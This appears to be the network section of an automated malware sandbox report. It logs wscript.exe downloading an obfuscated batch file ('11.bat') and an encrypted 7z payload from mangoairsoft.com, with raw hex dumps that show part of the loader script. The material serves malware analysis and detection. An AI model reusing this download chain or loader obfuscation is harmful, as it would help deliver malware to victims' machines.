2023-08-02 08:35:11 UTC	496	IN	Data Raw: 45 48 63 48 4b 76 49 76 6f 43 59 4b 74 52 64 6e 66 45 6d 72 4e 70 6d 50 6c 6e 45 4a 66 43 48 58 69 55 75 4a 73 6c 78 4f 71 67 6e 71 54 58 78 48 48 64 79 4b 71 55 51 61 64 63 45 73 47 4b 4a 4a 4c 73 4c 46 4e 6c 54 62 63 62 50 77 58 57 57 62 75 75 4b 48 61 50 66 46 55 77 45 58 44 47 74 6b 78 7a 68 74 6c 4b 6e 51 42 4c 49 68 46 71 51 79 79 41 71 76 7a 43 52 4b 62 54 6e 55 76 4d 7a 5a 72 4b 42 6e 4f 64 5a 58 57 75 4f 6b 4a 42 72 49 4a 78 49 57 43 6e 41 63 42 59 52 53 47 73 6c 62 4f 4a 66 6a 55 74 53 4b 50 6d 65 55 4c 64 56 79 4e 61 4a 75 43 66 6a 74 43 78 4e 7a 58 71 6d 6a 57 6f 78 57 6b 4f 68 7a 5a 50 54 75 74 44 4a 57 5a 41 59 6b 4b 4c 45 65 4a 75 55 53 4f 68 66 51 42 53 68 4c 75 56 47 49 65 59 79 49 66 4f 59 64 67 5a 42 65 44 64 69 51 59 78 5a 65 56 4e 4c Data Ascii: EHcHKvIvoCYKtRdnfEmrNpmPlnEJfCHXiUuJslxOqgnqTXxHHdyKqUQadcEsGKJJLsLFNlTbcbPwXWWbuuKHaPfFUwEXDGtkxzhtlKnQBLIhFqQyyAqvzCRKbTnUvMzZrKBnOdZXWuOkJBrIJxIWCnAcBYRSGslbOJfjUtSKPmeULdVyNaJuCfjtCxNzXqmjWoxWkOhzZPTutDJWZAYkKLEeJuUSOhfQBShLuVGIeYyIfOYdgZBeDdiQYxZeVNL
2023-08-02 08:35:11 UTC	512	IN	Data Raw: 41 63 59 64 65 49 6e 52 44 51 4f 69 67 64 65 53 65 65 76 6e 66 4e 6d 65 4e 5a 4b 52 6b 56 76 71 6d 49 4d 63 71 4d 47 65 4d 50 59 43 4a 65 73 6c 76 52 4d 6c 42 4e 4f 6a 55 4f 74 42 43 41 52 6a 52 4a 73 4d 5a 76 77 66 79 58 61 45 42 54 6c 50 62 57 4a 57 64 72 4c 6a 6f 63 6e 7a 6f 67 53 41 78 64 68 49 62 63 5a 72 6c 4e 66 53 6b 63 61 73 52 44 64 45 73 55 4d 4c 78 65 56 59 49 4e 54 6d 4c 74 49 64 43 55 55 64 73 73 4b 67 6b 51 44 45 4b 78 72 48 50 69 75 48 74 45 7a 67 70 74 68 73 76 4a 42 4a 44 64 52 4c 77 4b 70 52 68 62 69 5a 70 55 62 50 54 48 56 72 4d 46 57 4d 6a 71 4c 72 59 57 76 66 76 66 46 58 54 65 41 47 75 6c 6e 6f 6d 44 74 68 4b 61 77 63 59 6a 42 4e 62 46 67 6d 6d 67 71 50 58 4d 64 61 55 55 4e 71 43 62 41 69 71 6f 50 66 4c 72 42 52 57 74 76 78 55 44 45 Data Ascii: AcYdeInRDQOigdeSeevnfNmeNZKRkVvqmIMcqMGeMPYCJeslvRMlBNOjUOtBCARjRJsMZvwfyXaEBTlPbWJWdrLjocnzogSAxdhIbcZrlNfSkcasRDdEsUMLxeVYINTmLtIdCUUdssKgkQDEKxrHPiuHtEzgpthsvJBJDdRLwKpRhbiZpUbPTHVrMFWMjqLrYWvfvfFXTeAGulnomDthKawcYjBNbFgmmgqPXMdaUUNqCbAiqoPfLrBRWtvxUDE
2023-08-02 08:35:11 UTC	528	IN	Data Raw: 4a 63 74 64 68 67 52 4c 50 58 6e 71 66 41 4a 4c 69 77 76 43 49 6b 64 77 49 68 43 6d 75 53 70 45 52 6d 43 70 41 53 6a 58 78 63 53 55 49 63 78 64 44 64 57 53 4d 4d 77 42 78 67 63 5a 44 4c 75 6e 74 65 45 45 67 72 54 63 69 65 49 6d 6d 72 46 44 64 44 58 51 73 5a 4b 66 6a 78 53 6f 49 65 65 43 6a 6f 54 6c 68 63 46 71 5a 4f 64 59 4c 76 6d 61 4b 6a 62 76 73 73 6f 58 62 6f 58 6d 77 5a 51 69 78 6f 4d 7a 57 47 51 73 4d 65 4b 6d 69 4c 61 41 77 42 65 4a 63 68 6f 4f 45 67 44 56 53 4b 64 46 4a 76 76 4a 6d 72 7a 4c 54 71 6a 71 6f 4c 74 67 6d 4b 6c 52 4d 67 7a 4d 69 70 53 6e 55 57 49 70 61 6f 70 41 6f 61 59 4e 59 75 59 6b 56 73 70 42 70 42 52 4c 47 73 4f 47 44 46 45 6d 77 77 44 53 57 4c 79 61 54 42 49 6a 52 6e 4b 75 48 4a 57 64 4d 77 68 6e 54 72 56 67 61 61 64 50 64 73 75 Data Ascii: JctdhgRLPXnqfAJLiwvCIkdwIhCmuSpERmCpASjXxcSUIcxdDdWSMMwBxgcZDLunteEEgrTcieImmrFDdDXQsZKfjxSoIeeCjoTlhcFqZOdYLvmaKjbvssoXboXmwZQixoMzWGQsMeKmiLaAwBeJchoOEgDVSKdFJvvJmrzLTqjqoLtgmKlRMgzMipSnUWIpaopAoaYNYuYkVspBpBRLGsOGDFEmwwDSWLyaTBIjRnKuHJWdMwhnTrVgaadPdsu
2023-08-02 08:35:11 UTC	544	IN	Data Raw: 76 6d 75 4c 74 59 45 79 74 48 6e 47 51 7a 5a 45 63 59 4a 6e 6f 65 46 41 63 44 70 4f 79 47 4a 6b 74 50 6a 57 6b 67 63 58 45 4b 52 7a 4b 52 4d 73 43 6b 62 69 42 7a 64 53 56 68 43 67 6c 62 4f 5a 56 6e 65 77 76 71 47 63 55 65 64 5a 79 44 4b 5a 53 5a 53 41 4f 53 73 71 75 72 61 6e 49 41 6c 73 41 42 58 4b 44 66 6b 4b 62 79 71 4b 66 68 59 70 67 58 53 78 57 69 51 44 48 59 6f 6c 6d 71 70 63 47 4f 6d 6b 42 54 47 47 45 65 5a 69 7a 59 55 63 42 76 5a 52 73 68 68 62 61 63 67 4a 4e 41 69 51 4d 67 53 54 4a 58 57 56 41 49 4b 7a 77 72 73 65 61 64 42 49 4d 41 4a 55 74 54 66 71 49 41 7a 4c 42 72 67 65 75 62 49 4a 79 4e 77 6a 64 77 42 73 4b 68 68 4f 56 46 73 6e 56 68 62 78 50 54 48 4a 42 57 49 6f 58 4a 72 75 46 54 6c 77 6e 61 6a 70 72 68 74 69 67 67 72 6d 69 43 55 43 6c 6d 56 Data Ascii: vmuLtYEytHnGQzZEcYJnoeFAcDpOyGJktPjWkgcXEKRzKRMsCkbiBzdSVhCglbOZVnewvqGcUedZyDKZSZSAOSsquranIAlsABXKDfkKbyqKfhYpgXSxWiQDHYolmqpcGOmkBTGGEeZizYUcBvZRshhbacgJNAiQMgSTJXWVAIKzwrseadBIMAJUtTfqIAzLBrgeubIJyNwjdwBsKhhOVFsnVhbxPTHJBWIoXJruFTlwnajprhtiggrmiCUClmV
2023-08-02 08:35:11 UTC	560	IN	Data Raw: 67 55 49 79 54 51 50 6d 67 78 73 59 64 4e 62 74 6d 70 48 57 69 49 44 76 76 53 5a 4a 44 45 62 6a 71 64 72 6b 4a 4f 63 6f 64 51 57 74 54 5a 4d 6f 48 50 4d 53 4c 41 6b 43 4c 71 42 78 49 4f 41 4b 69 6a 71 5a 71 42 72 63 41 78 58 44 70 6e 4f 4b 4a 72 43 78 41 57 55 7a 58 43 4a 58 55 43 4d 45 69 73 76 55 69 77 76 6e 42 6d 52 73 55 78 4b 6a 53 77 69 4e 5a 43 50 49 66 45 6f 53 65 50 4f 70 77 47 51 59 6b 6e 57 4e 59 4d 73 66 4d 4b 42 48 58 6c 69 6c 6e 7a 63 42 46 6e 62 44 64 49 65 57 76 43 6f 74 4a 48 76 63 4d 48 64 77 51 47 76 66 4f 72 4c 6c 6c 61 42 73 4a 65 49 46 67 6a 43 63 4e 78 6c 68 4a 59 68 64 5a 61 5a 44 66 59 63 71 5a 52 69 75 68 46 54 42 64 79 74 4e 61 47 48 77 64 4d 54 44 77 4e 55 52 6a 78 64 4e 48 47 42 48 78 45 54 65 58 70 61 44 41 55 70 46 4f 4d 58 Data Ascii: gUIyTQPmgxsYdNbtmpHWiIDvvSZJDEbjqdrkJOcodQWtTZMoHPMSLAkCLqBxIOAKijqZqBrcAxXDpnOKJrCxAWUzXCJXUCMEisvUiwvnBmRsUxKjSwiNZCPIfEoSePOpwGQYknWNYMsfMKBHXlilnzcBFnbDdIeWvCotJHvcMHdwQGvfOrLllaBsJeIFgjCcNxlhJYhdZaZDfYcqZRiuhFTBdytNaGHwdMTDwNURjxdNHGBHxETeXpaDAUpFOMX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49693	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-02 08:35:12 UTC	575	OUT	GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?487817 HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: mangoairsoft.com Connection: Keep-Alive
2023-08-02 08:35:13 UTC	575	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 02 Aug 2023 08:35:12 GMT Content-Type: application/x-msdos-program Content-Length: 1908 Connection: close Last-Modified: Thu, 27 Jul 2023 14:27:09 GMT ETag: "774-60178c25fc517" Accept-Ranges: bytes
2023-08-02 08:35:13 UTC	575	IN	Data Raw: 40 65 63 68 6f 20 6f 66 66 0a 0a 3a 3a 20 52 31 31 66 66 73 52 73 66 73 52 62 0a 3a 3a 20 33 5a 36 66 4b 66 73 52 4b 66 73 52 62 0a 0a 73 65 74 20 22 66 64 61 61 3d 73 65 74 20 22 0a 25 66 64 61 61 25 22 66 64 67 78 76 78 63 76 78 63 3d 43 3a 5c 50 72 6f 67 22 0a 25 66 64 61 61 25 22 68 67 68 67 64 67 64 66 73 7a 3d 72 61 6d 44 22 0a 25 66 64 61 61 25 22 68 79 74 75 72 64 66 67 66 3d 61 74 61 5c 22 0a 0a 3a 3a 20 52 31 31 4b 66 73 66 66 73 52 73 73 52 73 52 73 52 52 62 0a 3a 3a 20 73 73 52 73 52 66 73 52 73 52 52 62 0a 0a 25 66 64 67 78 76 78 63 76 78 63 25 25 68 67 68 67 64 67 64 66 73 7a 25 25 68 79 74 75 72 64 66 67 66 25 0a 0a 73 65 74 20 22 66 67 64 67 68 3d 73 65 74 20 22 0a 25 66 67 64 67 68 25 22 76 62 6e 76 62 76 3d 57 73 63 72 22 0a 25 66 67 64 Data Ascii: @echo off:: R11ffsRsfsRb:: 3Z6fKfsRKfsRbset "fdaa=set "%fdaa%"fdgxvxcvxc=C:\Prog"%fdaa%"hghgdgdfsz=ramD"%fdaa%"hyturdfgf=ata\":: R11KfsffsRssRsRsRRb:: ssRsRfsRsRRb%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%set "fgdgh=set "%fgdgh%"vbnvbv=Wscr"%fgd

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49694	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-02 08:35:14 UTC	577	OUT	GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z HTTP/1.1 Host: mangoairsoft.com User-Agent: curl/7.55.1 Accept: /
2023-08-02 08:35:14 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 02 Aug 2023 08:35:14 GMT Content-Type: application/x-7z-compressed Content-Length: 2306944 Connection: close Last-Modified: Thu, 27 Jul 2023 14:02:55 GMT ETag: "233380-601786bbd2554" Accept-Ranges: bytes
2023-08-02 08:35:14 UTC	578	IN	Data Raw: 37 7a bc af 27 1c 00 04 62 94 ad 89 3b 33 23 00 00 00 00 00 25 00 00 00 00 00 00 00 bd 7d 05 34 e0 1b b1 06 4e 5d 00 06 82 cb 94 d3 b9 af f7 1e d4 db db 26 fe 12 c2 40 84 0b ca 5a 74 41 a5 34 05 82 78 3d 69 f9 1a 84 68 af 35 e1 8b 55 42 68 d8 4b a5 de e9 e9 9e 4b 42 7d 22 47 41 bd cc 0e cb d2 0c 2e 18 9d db 78 b3 e6 e2 c7 e7 36 ff 63 8a 38 ec f2 56 ac 3e a9 8a 33 ba 33 a3 7e c2 dd a8 1e 62 8e af 58 c3 d3 08 ed f6 1b 57 d8 62 c6 f4 a1 77 f7 19 db ec 8d 75 62 51 00 a2 a3 68 5b fa b4 16 0d 60 bf cc 33 29 87 ac b4 91 3e cc a8 0a e2 ee 0f b7 55 05 96 4b 13 ec 59 e2 30 7d 28 ee 67 a3 a1 37 e2 84 d2 ab 62 72 77 92 c2 79 d5 ef 15 10 2f 33 7a cb 74 f6 de 9c 0d 2c d2 67 a5 40 f4 ac 92 61 4a c2 9d d1 7f 8e f8 99 30 4b 0c 96 12 aa c4 d2 d1 f2 27 51 d6 ec 06 9e f3 fd Data Ascii: 7z'b;3#%}4N]&@ZtA4x=ih5UBhKKB}"GA.x6c8V>33~bXWbwubQh[`3)>UKY0}(g7brwy/3zt,g@aJ0K'Q
2023-08-02 08:35:14 UTC	593	IN	Data Raw: 20 a1 58 17 00 5c de 14 66 93 6e 4d e6 0f 0d ec 4e 9a f7 0d d3 c0 ec b2 50 4f 23 af b6 9c e4 9e 86 1f 2c 28 d8 72 1d 14 3a 77 40 be 76 d9 d5 08 0b 27 b4 15 6e 50 48 83 9b ba b5 39 7e 63 9a 91 da 1f 0d c4 59 da 7f 8b 43 02 34 9c f2 5d 1d 01 25 52 70 eb 3e 89 2a f0 2a e3 76 ee 1b 8c 1d 69 06 51 fc 25 bb 7a 34 17 bf 70 91 ba 22 db a5 4a 57 11 7e ab 1d c7 77 12 24 7d 1f 16 26 24 85 04 b5 d9 99 63 85 cc cd 90 34 2c 1f 24 31 0d 13 ef 05 7e 89 2f 8d 70 b9 aa 25 75 51 d5 ab 20 d1 e7 b0 d7 6a 28 f8 ad 0e e2 04 c9 e4 cc 07 bd 51 af 5a 42 18 b1 1f 10 9e ab c3 74 ae 3f d1 a6 80 be 92 8d 39 05 9a 75 7b 10 94 53 44 db 94 7d ad 05 8d 30 07 0f e0 ea e6 d4 52 23 58 6b c3 84 b0 5d 17 56 11 59 83 e3 92 ad d0 26 22 a5 70 60 77 cd 68 de 65 38 13 16 a3 33 ba 26 56 ab 03 f3 cf Data Ascii: X\fnMNPO#,(r:w@v'nPH9~cYC4]%Rp>**viQ%z4p"JW~w$}&$c4,$1~/p%uQ j(QZBt?9u{SD}0R#Xk]VY&"p`whe83&V
2023-08-02 08:35:14 UTC	609	IN	Data Raw: 38 27 45 be 2c f7 1e 6e 22 d1 5b 21 f0 a4 45 8f c4 f2 bf 48 84 4c 1d e1 d3 79 7a c1 71 5e a8 0c 3c d7 28 2c f8 dd 60 ef 73 15 a8 7f 03 20 a6 e5 39 83 fa 82 0e a9 fd 2e 46 d8 49 ca c9 18 27 60 d6 20 de 75 30 ce 3d c1 7b 16 30 1f 9b cd c6 13 d4 a6 29 f7 70 da 5a 02 ab c8 0e 09 96 79 c0 e8 13 bd e9 72 b0 3f c9 35 35 bc 9d 0a 2a 3b 79 cc aa 6e d6 a2 a9 3c 33 9a 4c 0a 5b 49 3c 74 05 9b ae cf f4 dc 59 86 ba 4a ad a5 25 f6 a7 0f 44 d7 bd b3 74 96 9d be d6 3c 03 23 e3 f5 57 41 ed 7e 70 7c d2 91 59 08 08 3b ef a6 e4 d9 b9 dc fa e5 73 56 12 cd d6 05 3f 90 7b 6f 61 fd 59 8a 79 52 13 78 cd a7 9d 97 50 f6 0b c0 b7 25 ee af b3 bc ae 55 3a 5a 7a 36 c4 a1 0a 47 bf ad 1f f6 6e 8a 7a 31 cd 2f 8d dc b1 81 6f d5 7a 05 26 80 8f 20 46 27 a4 43 cb 71 4b 3b 3f 4a e8 51 67 35 44 Data Ascii: 8'E,n"[!EHLyzq^<(,`s 9.FI'` u0={0)pZyr?55*;yn<3L[I<tYJ%Dt<#WA~p\|Y;sV?{oaYyRxP%U:Zz6Gnz1/oz& F'CqK;?JQg5D
2023-08-02 08:35:14 UTC	625	IN	Data Raw: f1 57 ce 65 46 f3 a2 05 d3 1e 75 34 50 05 ee 13 94 27 62 02 89 fd 39 1e d7 ef d0 12 c5 cc 43 30 6d 3a f1 31 33 e4 b5 e0 14 5a 6c fb cd b2 80 73 d1 c1 ea 45 51 ca 18 88 2c 52 4f 2f 3f 3a d6 b6 6e 32 e0 08 94 72 2c be 66 2c ed 90 5d b9 0b 1e 82 86 95 11 fc 15 a7 d4 43 93 71 ba 17 53 28 57 78 6a 6d 5a 5f 97 f9 26 50 b8 e7 8d e2 9b 3a 01 c3 2a b6 f5 88 e0 13 42 86 48 03 39 ac 20 c6 ab 64 85 e5 78 47 47 59 57 2b 5f 64 8e c7 21 d5 73 ec 4f 9f db f9 12 99 cc e5 dc 8b df 1a ba 8b 0d 18 ec eb ff 76 af 6a 25 5d 89 68 0e 1a 6c 55 fb c1 fa 6f d0 9f b2 e0 ba e7 bc dd 94 f6 f4 65 68 25 ed 34 22 7d 37 4c a6 68 08 3e 43 3d b5 69 ac a5 43 d5 4b d6 b3 2a 6b 77 5f 08 11 ba 63 d8 68 da 98 17 b0 45 c2 6b 3e 00 f0 f3 1c 66 97 74 79 e7 2a 03 11 23 bb 99 81 86 b2 8b e5 27 95 2d Data Ascii: WeFu4P'b9C0m:13ZlsEQ,RO/?:n2r,f,]CqS(WxjmZ_&P:BH9 dxGGYW+_d!sOvj%]hlUoeh%4"}7Lh>C=iCKkw_chEk>fty*#'-
2023-08-02 08:35:14 UTC	641	IN	Data Raw: 1d ca 0d d7 81 55 36 0f 11 a0 78 f5 8e f1 b9 74 f8 3a ef 1e b9 69 d9 da ec 8e ea b0 05 30 6a d8 f4 8f 04 61 93 9d 9f 58 55 56 b5 58 0e 4e ae e6 e5 e2 9b 6d e6 7a 78 cc 53 93 28 3f 34 a9 23 4c 29 b3 7a e1 5a c8 91 a2 ba f5 9f e4 0c 42 da ce 17 24 a7 fb a5 58 64 88 04 d0 44 6a 93 f3 c1 af e6 8d d8 87 f0 b8 85 fc a9 a6 f5 a6 ad bf 07 c1 b4 c5 c8 ed eb 26 82 b3 3c dd 10 eb 61 87 4e 2d bf 08 bf 66 28 be 12 de 14 1f 2f ab 2e a1 a8 b2 5f da 9c 41 c9 6f 6b 4c 7a 04 21 7f 82 6e e8 8e 7b 46 bc 15 e7 bd 37 b8 a7 6b c8 0a 8e a4 6f 28 99 01 7d 1d 22 b6 a5 dd e0 05 96 0b 09 c2 27 96 09 15 48 ec 80 4b d6 d7 9f 49 02 1a 08 d3 6d 93 25 c1 79 15 fc 2b c9 c9 9b a5 01 f3 e8 f9 0b 80 26 9f 07 0b 4e d1 7c 65 d1 d7 5f ae 3f a7 7c 30 91 ce c1 e8 b6 d9 6b 9c c4 29 36 be 4f ba 0b Data Ascii: U6xt:i0jaXUVXNmzxS(?4#L)zZB$XdDj&<aN-f(/._AokLz!n{F7ko(}"'HKIm%y+&N\|e_?\|0k)6O
2023-08-02 08:35:14 UTC	657	IN	Data Raw: bf 83 7f e1 a3 bc 15 5a 32 72 cd 06 d5 3b 9d 67 43 4d 24 e8 0e ea 69 ad bd f5 09 fd 0f 29 6d cd 0c 63 c8 05 e0 79 71 c5 59 d1 e6 68 c5 14 96 cb b6 a9 17 0b ef 44 1c 50 57 fe c1 a5 d3 fc d9 d6 b8 5d 39 c5 5f 0f a6 ef 5b c0 d7 36 76 9f ac 06 e9 b4 ac 98 ba 2a 38 8e d1 14 22 94 fc 9e 55 1c 12 b9 33 0b 6c 0b 8a 9a f0 21 b0 98 da 02 1e 87 5b 6f b0 ff 43 d2 c5 f0 6e 16 14 2e ed 15 9c 4e d1 ce 19 f4 b4 e7 d3 b7 b3 7f 78 8d a6 1c c2 a1 27 7e d3 15 ea 1f a2 97 89 47 7f 60 3c 4e 99 d2 bf 5e e4 8f 40 20 a1 e7 07 b4 92 02 66 ca 03 94 5d d8 29 e2 af c2 b3 f5 58 9b 32 c1 fe 0e e1 7d e8 93 e2 f7 ac 52 77 39 db a8 e4 73 9a 31 f9 cd 31 1d 7a 14 9f 20 4e 76 cb a9 2d b1 d1 66 b9 a7 ab 7e 57 e4 aa c8 c4 d4 66 34 8d 42 9d 51 c9 12 3c d5 ad 00 c1 6b 77 22 dc 77 20 22 f5 4d 57 Data Ascii: Z2r;gCM$i)mcyqYhDPW]9_[6v*8"U3l![oCn.Nx'~G`<N^@ f])X2}Rw9s11z Nv-f~Wf4BQ<kw"w "MW
2023-08-02 08:35:14 UTC	673	IN	Data Raw: 7f 7e 8e 38 2a e7 74 1b 62 ea c6 d4 7e 8d 8b 71 b9 85 58 30 83 69 5b 12 1d 4d 22 f2 39 b6 80 8c 23 3f 09 f4 45 88 f4 05 c6 18 6e dd 99 2e 0c 7a 0e d2 27 f5 2a 56 90 a8 58 99 29 58 ea fd b7 70 a1 c0 a0 d6 a9 de ce 40 a3 77 50 d5 e6 71 44 4f 43 c4 90 49 41 93 01 ed 2a af f7 08 c4 dc 07 db eb 6f 88 a1 e7 33 15 cf 62 07 a1 42 05 26 08 35 ef 95 f8 56 5d d5 6e f3 ca b1 c0 86 bd 43 4b eb 3e e6 46 44 4c 27 18 ba 4e cc d1 c2 07 c4 ec 69 87 9a c7 12 bd 71 9e 19 cd 51 df d7 a6 e2 b7 2d f2 12 5d cf 70 5b 22 99 48 d2 3b 60 1f 89 c5 0d ad 52 28 70 1a d0 81 2c b1 e7 6f 1b 33 70 22 98 bc 22 d9 75 93 f3 f0 94 ee 57 56 79 3a 52 57 2c 1b f7 2a 08 b3 7e d8 6d 2e 9e 53 79 f5 00 57 e1 4a b4 f1 9a 81 22 a2 6b dc 2a 69 dd 3d d9 d9 c9 3c 73 d0 8b 1c d5 1d 71 dd 0d c4 8d cd 21 f9 Data Ascii: ~8tb~qX0i[M"9#?En.z'VX)Xp@wPqDOCIAo3bB&5V]nCK>FDL'NiqQ-]p["H;`R(p,o3p""uWVy:RW,~m.SyWJ"k*i=<sq!
2023-08-02 08:35:14 UTC	689	IN	Data Raw: 2c 80 a3 55 08 82 d6 cf 94 59 0e 12 21 ea bd 66 f8 b6 f9 a3 c8 9d 44 56 73 93 de cf fe 6a 50 a0 d2 3f 61 97 69 79 8f dd 4f 89 1d b9 6f 39 e2 e5 26 7d e3 e1 6d 56 13 fe 72 61 dd 36 76 0f 27 7c 48 2f a1 06 5f b4 33 87 c3 6b 65 83 17 d8 a3 dc db 30 29 8b 74 45 32 60 fd 3f 79 50 1e 36 77 40 fc 8d fe 20 0d 60 94 73 8c ec 17 07 14 57 fc 17 21 80 bf be 8e c7 22 af 6e 0e 56 81 71 04 f4 c2 4f 9b 60 85 4a 9f f2 29 e0 86 db b3 f1 cc 04 f4 53 dd 94 df cb da bb 8f f9 5c ce f5 f4 9a e8 60 6e 39 8b 89 b9 99 3e 70 d5 50 07 fc 78 a7 88 8e df 3f f0 a9 10 a8 c1 b6 9b d4 4d 8b 5a f3 7e 7c 1e 14 f5 0d 5c f8 d0 41 be 0b 07 f2 a9 63 ec 24 7b 9f a4 d6 3e 13 c3 28 52 b7 08 ab 98 f2 af 3b 0c f0 16 66 a1 f7 a2 66 3a d3 40 b3 4c a2 09 13 38 69 d6 60 9c df 79 71 b4 01 47 d5 5f c7 83 Data Ascii: ,UY!fDVsjP?aiyOo9&}mVra6v'\|H/_3ke0)tE2`?yP6w@ `sW!"nVqO`J)S\`n9>pPx?MZ~\|\Ac${>(R;ff:@L8i`yqG_
2023-08-02 08:35:14 UTC	705	IN	Data Raw: 1c 1b 35 5f 31 b1 08 e7 a3 a1 9a ee ae 53 42 f1 63 d7 15 c4 71 57 52 19 fb f2 f6 65 dd bb 37 d7 68 26 a1 7d 54 6d e0 86 58 08 18 23 85 83 36 e9 c1 4b 54 29 2f b2 1b 06 90 db 09 4f c4 69 c2 e3 81 2d aa 8b e0 75 93 cc 7e 5c f2 e8 60 92 66 e2 93 90 00 fb 6d 93 cf a7 68 12 84 55 07 e3 8b 48 e9 b2 57 d4 11 d0 78 c4 b4 3a c9 3a 96 9d 04 b9 48 3f 96 53 97 7d 17 10 f0 02 86 b7 c6 54 63 55 19 70 8c ad 00 b0 0d fa 99 06 e7 0a 7b c7 da 9b 3c 06 56 7a 66 d9 9e c0 9a ac 53 99 4d 7a df b6 f7 83 2f 8d d4 f2 6e c1 97 76 fc 48 6c e8 d7 03 e8 76 44 3e b4 89 05 d1 53 11 4e 48 56 c9 90 77 36 80 7b 60 22 bb 57 40 f1 26 ee 58 69 45 52 56 af 07 4a 6d a9 20 ef 7d 5c 80 ea 8a 3e d7 ae 8a 06 10 ca ca 7b 84 3d 11 d9 0c 3a d9 d7 55 16 8a 78 4b 38 a1 4a b8 82 01 07 9e a5 4a dc 05 e3 Data Ascii: 5_1SBcqWRe7h&}TmX#6KT)/Oi-u~\`fmhUHWx::H?S}TcUp{<VzfSMz/nvHlvD>SNHVw6{`"W@&XiERVJm }\>{=:UxK8JJ
2023-08-02 08:35:14 UTC	721	IN	Data Raw: 7d db a1 98 8b 0b 32 2a 7c 4d 92 75 97 9d e5 fc 13 17 34 7d b3 4a ec c9 6e ab a0 c3 31 a2 aa 17 69 f7 4f a9 ec 5c e6 10 11 cf af a1 3c 10 9a f6 7c cc 29 dc 18 04 7a bc a9 14 8d 67 3b 22 ff 94 fd f8 c1 6a ae 8e c4 3b bd 42 ba 97 4f f3 10 34 5e ce 1d ee ac 29 b2 e3 f3 b7 5f df 35 48 03 63 7b 91 1e a6 dd 5e 42 58 e9 f4 36 05 5a ae c5 6f f5 cc 11 ef 31 d4 d1 6e e1 3f 81 eb e5 b2 48 9f 15 fb 02 90 f7 73 96 5c 38 8c 91 b5 de 6a 88 51 87 e2 fe 27 8f b4 50 9d d9 5d 8a 54 5b bb 39 f0 49 a8 4c d6 a2 aa 23 1e e6 70 fe 64 8a 95 c1 a8 e2 d0 92 f9 1f 1f b0 c9 9c b4 74 68 b8 8d 23 6d e8 f8 f8 f3 3e 74 48 d7 e3 a2 f5 60 60 a5 7b bc 1b 59 9f 33 9e ef 05 73 a8 f2 3b d6 85 37 89 3c ee 88 d3 41 b1 23 de f4 02 dd 22 0e 29 3e 01 9e 08 b1 8a b2 da 68 6b 5d 3d 0f 5f a0 ea 4d ee Data Ascii: }2*\|Mu4}Jn1iO\<\|)zg;"j;BO4^)_5Hc{^BX6Zo1n?Hs\8jQ'P]T[9IL#pdth#m>tH``{Y3s;7<A#")>hk]=_M
2023-08-02 08:35:14 UTC	737	IN	Data Raw: 8c 17 75 39 7d 85 5e e0 8d 48 4e 9f 46 a1 35 82 c6 49 18 09 3f f4 6d 3a 03 a2 be 60 4c 59 41 2e dd 59 70 75 ab d5 ca 4c 16 a9 88 17 54 b6 05 b7 88 b8 26 77 01 b9 4e 71 25 e9 3d 34 bb 69 3e 40 e1 8f d4 a3 88 d1 54 0b 12 ec 27 39 f6 a4 57 a2 f3 b3 5b 86 e7 89 87 26 0c fd d0 e0 00 4a 42 47 26 84 ca 0f 26 c0 48 eb f4 c0 f1 c2 5f 9e a0 a9 91 0c d0 3d b2 bd 97 54 cf f9 2d 7f 39 b3 be d5 90 fe d6 5f ad 58 30 8d 1d 2b 25 2a 08 ae 57 f0 7d a3 a3 c4 cf b4 c6 4e b3 dd 14 a3 dc ce 7e da ad 75 20 d6 01 70 b6 25 df 0e eb c2 c4 92 f0 12 02 10 38 12 c1 86 df 1d 20 c8 a1 07 5f e5 c7 e0 c2 62 d1 2b ef 0e f4 e6 20 26 b7 ad c1 5e 68 08 46 44 9c f4 fd 97 cc f5 5d b8 4a 00 39 56 4f d2 46 60 54 7f 3f 9f e9 23 90 b8 ad b7 3c 8e 82 4c 4e ce 3e 7d dc 9b f7 1f 4e b8 e1 94 0d 36 24 Data Ascii: u9}^HNF5I?m:`LYA.YpuLT&wNq%=4i>@T'9W[&JBG&&H_=T-9_X0+%*W}N~u p%8 _b+ &^hFD]J9VOF`T?#<LN>}N6$
2023-08-02 08:35:14 UTC	753	IN	Data Raw: c6 30 7f 56 6f 91 54 9b 0f c1 50 8a 90 5d b4 4c 73 64 bb 05 6b cf bf 16 e1 92 c9 47 b0 d0 0e 87 f1 f6 b1 24 bc 3e 08 91 9b 4b 6c 6a 9a 23 5d 85 fc ca 7d cd dc 1f 65 17 e9 41 d0 81 90 5f fd 41 ed bd 6c 85 6e e7 ab ea ba 1c 46 a3 c9 06 8e ea 16 68 94 b2 7e 27 ef fb a8 3b eb e5 81 35 75 bf 9c f4 43 f6 ca d8 87 27 fd c6 6b 4f b2 3f 93 cf d0 6a 59 d3 f2 d5 3d fc 2e 08 e3 68 72 ee 3d 72 ef e6 30 e4 66 e5 f7 89 bf 3a 20 93 48 18 80 6e 07 df df a0 71 0b ca 43 8b 49 bd 42 40 83 46 d2 71 1c dd 29 2b 3c 1a db d7 77 31 10 73 8e 2c a0 98 98 ab 95 46 5f de 40 8b c7 63 51 5d 80 2a 0d 93 16 d9 e0 38 47 f3 6f 46 51 02 e5 33 8c 09 52 f6 de 84 c7 11 7d 20 22 16 11 57 46 87 75 44 ec 12 0a e9 30 06 7b 8c 2e b4 d1 10 bd 2e 7f 78 79 27 e4 cd c1 6a 9d 74 0d 9f 6b 4e e2 6d 79 c2 Data Ascii: 0VoTP]LsdkG$>Klj#]}eA_AlnFh~';5uC'kO?jY=.hr=r0f: 